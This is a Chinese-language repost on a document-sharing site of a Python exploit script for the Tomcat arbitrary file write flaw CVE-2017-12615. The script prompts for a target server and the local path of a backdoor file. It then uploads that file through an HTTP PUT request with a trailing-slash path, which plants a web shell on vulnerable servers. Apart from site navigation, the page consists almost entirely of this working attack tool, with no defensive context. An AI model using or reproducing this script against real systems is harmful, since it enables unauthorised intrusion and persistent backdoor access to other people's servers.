栏目分类:
子分类:
返回
文库吧用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
文库吧 > IT > 软件开发 > 后端开发 > Python

Tomcat文件写入 CVE-2017-12615 EXP

Python 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

Tomcat文件写入 CVE-2017-12615 EXP

import sys
import requests

def title():
    print("[-------------------------------------------------------------]")
    print("[--------------      Tomcat 文件写入漏洞      ---------------]")
    print("[--------               CVE-2017-12615               ----------]")
    print("[--------		use:python3 CVE-2017-12615.py  --------]")
    print("[--------              Author:鸣蜩十四           ------------]")
    print("[-------------------------------------------------------------]")

def main() :
    if (len(sys.argv)==1):
        url = input("请输入目标网站地址(http://ip:port/):")
        name = input("请为上传文件命名:")
        path = input("请输入后门的绝对地址:")
        poc(url,name,path)
    else :
        print("Example: n   python3 " + sys.argv[0] + "n")

def poc(url,name,path) :
    r = requests.put(url=url+name+'/',data=open(path, 'rb'),verify=False)
    if r.status_code == 201 :
        print("[+] 可能存在 Tomcat写入漏洞,请从网页查看是否上传成功")
    else :
        print("[-] 不存在该漏洞!")


if __name__ == "__main__" :
    title()
    main()
转载请注明:文章转载自 www.wk8.com.cn
本文地址:https://www.wk8.com.cn/it/280323.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 wk8.com.cn

ICP备案号:晋ICP备2021003244-6号